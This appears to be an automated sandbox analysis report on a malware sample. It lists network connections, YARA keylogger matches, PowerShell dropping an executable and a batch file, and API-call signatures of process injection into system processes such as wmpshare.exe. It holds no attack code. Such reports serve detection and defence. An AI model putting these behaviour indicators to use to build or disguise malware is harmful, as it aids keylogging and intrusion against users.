Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51101
Source: unknown Network traffic detected: HTTP traffic on port 53736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52675
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52676
Source: unknown Network traffic detected: HTTP traffic on port 51621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50215 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51359
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53532
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51593
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51594
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52441
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50267
Source: unknown Network traffic detected: HTTP traffic on port 52087 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52204
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50269
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52203
Source: unknown Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51361
Source: unknown Network traffic detected: HTTP traffic on port 50138 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51517 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51463 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.9:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:49954 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.9:49988 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: regsvr32.exe, 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_391f15e7-8
Installs a raw input device (often for capturing keystrokes)
Source: regsvr32.exe, 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_5bce3ff8-f
Yara detected Keylogger Generic
Source: Yara match File source: 12.3.OpenWith.exe.22bf7cc0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.1c860000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.OpenWith.exe.22bf7fa0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.1c580000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.OpenWith.exe.22bf7fa0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.1c860000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.1c580000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.OpenWith.exe.22bf7cc0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1540794217.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1533339761.000000001C860000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 8144, type: MEMORYSTR

System Summary
barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\utox_x86_x64.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717757000 NtWriteFile,WaitForSingleObject, 4_2_00007FF717757000
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717756EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 4_2_00007FF717756EE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF851B4 NtQueryInformationProcess, 8_2_1BF851B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF856A8 NtQuerySystemInformation,NtQuerySystemInformation,lstrcmpiW,CloseHandle,free, 8_2_1BF856A8
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F30C7 calloc,NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,RtlFreeHeap,RtlFreeHeap, 12_3_0000022BF71F30C7
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_3_00007DF431881958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 14_3_00007DF431881958
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_3_00007DF431881CE8 CreateProcessW,NtResumeThread,CloseHandle,free, 14_3_00007DF431881CE8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D12C64 NtAcceptConnectPort, 14_2_0000023D20D12C64
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D12418 NtAcceptConnectPort, 14_2_0000023D20D12418
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1252C NtAcceptConnectPort, 14_2_0000023D20D1252C
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1288C NtAcceptConnectPort, 14_2_0000023D20D1288C
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D127B8 NtAcceptConnectPort, 14_2_0000023D20D127B8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D12990 NtAcceptConnectPort, 14_2_0000023D20D12990
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D128E8 NtAcceptConnectPort, 14_2_0000023D20D128E8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D128B8 NtAcceptConnectPort, 14_2_0000023D20D128B8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D129D4 NtAcceptConnectPort, 14_2_0000023D20D129D4
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_00007DF431872704 NtQuerySystemInformation,malloc,NtQuerySystemInformation, 14_2_00007DF431872704
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_00007DF431881E64 CreateProcessW,NtResumeThread,CloseHandle, 14_2_00007DF431881E64
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_00007DF43188199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory, 14_2_00007DF43188199C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000001E879D8385C NtQuerySystemInformation, 15_2_000001E879D8385C
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE32688 NtAcceptConnectPort, 18_2_000001AADAE32688
Source: C:\Windows\System32\rekeywiz.exe Code function: 18_2_000001AADAE3288C NtAcceptConnectPort, 18_2_000001AADAE3288C
Contains functionality to communicate with device drivers
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717756190: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError, 4_2_00007FF717756190
Detected potential crypto function
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71775B630 4_2_00007FF71775B630
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177594D0 4_2_00007FF7177594D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717702FE9 4_2_00007FF717702FE9
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717752E70 4_2_00007FF717752E70
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177718A0 4_2_00007FF7177718A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778F840 4_2_00007FF71778F840
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71777D887 4_2_00007FF71777D887
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71770F7E0 4_2_00007FF71770F7E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71777B7FD 4_2_00007FF71777B7FD
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71772B800 4_2_00007FF71772B800
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177AB720 4_2_00007FF7177AB720
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71779F730 4_2_00007FF71779F730
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717799750 4_2_00007FF717799750
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717767770 4_2_00007FF717767770
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A1780 4_2_00007FF7177A1780
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778D6A8 4_2_00007FF71778D6A8
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71770565B 4_2_00007FF71770565B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717711665 4_2_00007FF717711665
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71777D671 4_2_00007FF71777D671
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177795B6 4_2_00007FF7177795B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177315E0 4_2_00007FF7177315E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B15DD 4_2_00007FF7177B15DD
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778F5F0 4_2_00007FF71778F5F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177475F0 4_2_00007FF7177475F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71773D520 4_2_00007FF71773D520
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A7530 4_2_00007FF7177A7530
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177734B6 4_2_00007FF7177734B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778F440 4_2_00007FF71778F440
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B5410 4_2_00007FF7177B5410
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B7330 4_2_00007FF7177B7330
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A3350 4_2_00007FF7177A3350
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771B350 4_2_00007FF71771B350
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717723290 4_2_00007FF717723290
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771D1D0 4_2_00007FF71771D1D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71772B200 4_2_00007FF71772B200
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71779D160 4_2_00007FF71779D160
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717757170 4_2_00007FF717757170
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B40C0 4_2_00007FF7177B40C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71779A0E0 4_2_00007FF71779A0E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717792030 4_2_00007FF717792030
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B7FA0 4_2_00007FF7177B7FA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717733FB7 4_2_00007FF717733FB7
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778FFF0 4_2_00007FF71778FFF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177ABF20 4_2_00007FF7177ABF20
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71770FF83 4_2_00007FF71770FF83
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778DEF0 4_2_00007FF71778DEF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71774FF10 4_2_00007FF71774FF10
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717733DD0 4_2_00007FF717733DD0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177ABDE0 4_2_00007FF7177ABDE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778FE00 4_2_00007FF71778FE00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717779E0B 4_2_00007FF717779E0B
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717735CC0 4_2_00007FF717735CC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B5CE0 4_2_00007FF7177B5CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71774DD00 4_2_00007FF71774DD00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771DC80 4_2_00007FF71771DC80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A9BC0 4_2_00007FF7177A9BC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71779DBE0 4_2_00007FF71779DBE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717719B30 4_2_00007FF717719B30
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717773B40 4_2_00007FF717773B40
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717763AA0 4_2_00007FF717763AA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177B7AC0 4_2_00007FF7177B7AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A5B00 4_2_00007FF7177A5B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717701A31 4_2_00007FF717701A31
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717731B00 4_2_00007FF717731B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717761A40 4_2_00007FF717761A40
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71774DA50 4_2_00007FF71774DA50
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771BA80 4_2_00007FF71771BA80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778B9B0 4_2_00007FF71778B9B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717789920 4_2_00007FF717789920
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71776F960 4_2_00007FF71776F960
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717720820 4_2_00007FF717720820
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771C860 4_2_00007FF71771C860
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717740870 4_2_00007FF717740870
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177727A4 4_2_00007FF7177727A4
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177147CD 4_2_00007FF7177147CD
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71773A740 4_2_00007FF71773A740
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A4750 4_2_00007FF7177A4750
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A06A0 4_2_00007FF7177A06A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177126E2 4_2_00007FF7177126E2
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A6710 4_2_00007FF7177A6710
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717798520 4_2_00007FF717798520
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717734579 4_2_00007FF717734579
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771A4A0 4_2_00007FF71771A4A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71779E4C0 4_2_00007FF71779E4C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771446C 4_2_00007FF71771446C
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177603A0 4_2_00007FF7177603A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778C356 4_2_00007FF71778C356
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778C358 4_2_00007FF71778C358
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177AA2A0 4_2_00007FF7177AA2A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177482A0 4_2_00007FF7177482A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71777E23A 4_2_00007FF71777E23A
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71770E28F 4_2_00007FF71770E28F
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177941B0 4_2_00007FF7177941B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177AC1F0 4_2_00007FF7177AC1F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71777C120 4_2_00007FF71777C120
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771C170 4_2_00007FF71771C170
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71772E180 4_2_00007FF71772E180
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778F0A0 4_2_00007FF71778F0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71776D0A0 4_2_00007FF71776D0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771F030 4_2_00007FF71771F030
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71773F060 4_2_00007FF71773F060
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71778CFCB 4_2_00007FF71778CFCB
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71770EDB4 4_2_00007FF71770EDB4
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177AADE0 4_2_00007FF7177AADE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717730D80 4_2_00007FF717730D80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717778CAC 4_2_00007FF717778CAC
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A0CE0 4_2_00007FF7177A0CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A8CF0 4_2_00007FF7177A8CF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71776ED00 4_2_00007FF71776ED00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71771AC30 4_2_00007FF71771AC30
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177AEC60 4_2_00007FF7177AEC60
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A4BF0 4_2_00007FF7177A4BF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717748C00 4_2_00007FF717748C00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717742B80 4_2_00007FF717742B80
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717744AC0 4_2_00007FF717744AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177A2B00 4_2_00007FF7177A2B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717788A20 4_2_00007FF717788A20
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717792920 4_2_00007FF717792920
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717784920 4_2_00007FF717784920
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF71777A990 4_2_00007FF71777A990
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887B94DFB 5_2_00007FF887B94DFB
Source: C:\Windows\System32\regsvr32.exe Code function: 8_3_1B7818D7 8_3_1B7818D7
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1B7818D7 8_2_1B7818D7
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1B7808A4 8_2_1B7808A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF84A54 8_2_1BF84A54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF89FFC 8_2_1BF89FFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF83CEC 8_2_1BF83CEC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF85BC0 8_2_1BF85BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF88A58 8_2_1BF88A58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF8870C 8_2_1BF8870C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF8710C 8_2_1BF8710C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF81500 8_2_1BF81500
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_1BF82F00 8_2_1BF82F00
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FF887BA098D 8_2_00007FF887BA098D
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF5740967 12_3_0000022BF5740967
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F2C3C 12_3_0000022BF71F2C3C
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F4A38 12_3_0000022BF71F4A38
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F5E7C 12_3_0000022BF71F5E7C
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F58FC 12_3_0000022BF71F58FC
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F24F7 12_3_0000022BF71F24F7
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F557C 12_3_0000022BF71F557C
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F1BA6 12_3_0000022BF71F1BA6
Source: C:\Windows\System32\OpenWith.exe Code function: 12_3_0000022BF71F279C 12_3_0000022BF71F279C
Source: C:\Windows\System32\regsvr32.exe Code function: 13_3_1B5618D7 13_3_1B5618D7
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1B5618D7 13_2_1B5618D7
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1B5608A4 13_2_1B5608A4
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC65BC0 13_2_1BC65BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC69FFC 13_2_1BC69FFC
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC61500 13_2_1BC61500
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC62F00 13_2_1BC62F00
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC6870C 13_2_1BC6870C
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC6710C 13_2_1BC6710C
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC63CEC 13_2_1BC63CEC
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC64A54 13_2_1BC64A54
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_1BC68A58 13_2_1BC68A58
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF887B7098D 13_2_00007FF887B7098D
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_3_00007DF43188392C 14_3_00007DF43188392C
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_3_00007DF431882204 14_3_00007DF431882204
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_3_00007DF431884EFC 14_3_00007DF431884EFC
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D12D24 14_2_0000023D20D12D24
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D02628 14_2_0000023D20D02628
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D0C25C 14_2_0000023D20D0C25C
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1E398 14_2_0000023D20D1E398
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D15ADC 14_2_0000023D20D15ADC
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D30478 14_2_0000023D20D30478
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D46434 14_2_0000023D20D46434
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D3CC00 14_2_0000023D20D3CC00
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D40D90 14_2_0000023D20D40D90
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D3ECE4 14_2_0000023D20D3ECE4
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1DCE4 14_2_0000023D20D1DCE4
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D26D18 14_2_0000023D20D26D18
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D014D0 14_2_0000023D20D014D0
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D27684 14_2_0000023D20D27684
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D34DE8 14_2_0000023D20D34DE8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1F618 14_2_0000023D20D1F618
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D355B0 14_2_0000023D20D355B0
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D395D4 14_2_0000023D20D395D4
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D33F70 14_2_0000023D20D33F70
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D16F24 14_2_0000023D20D16F24
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1C750 14_2_0000023D20D1C750
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D286B4 14_2_0000023D20D286B4
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D1BEB8 14_2_0000023D20D1BEB8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D23EA4 14_2_0000023D20D23EA4
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D35EC8 14_2_0000023D20D35EC8
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D40874 14_2_0000023D20D40874
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D27094 14_2_0000023D20D27094
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 14_2_0000023D20D2D854 14_2_0000023D20D2D854
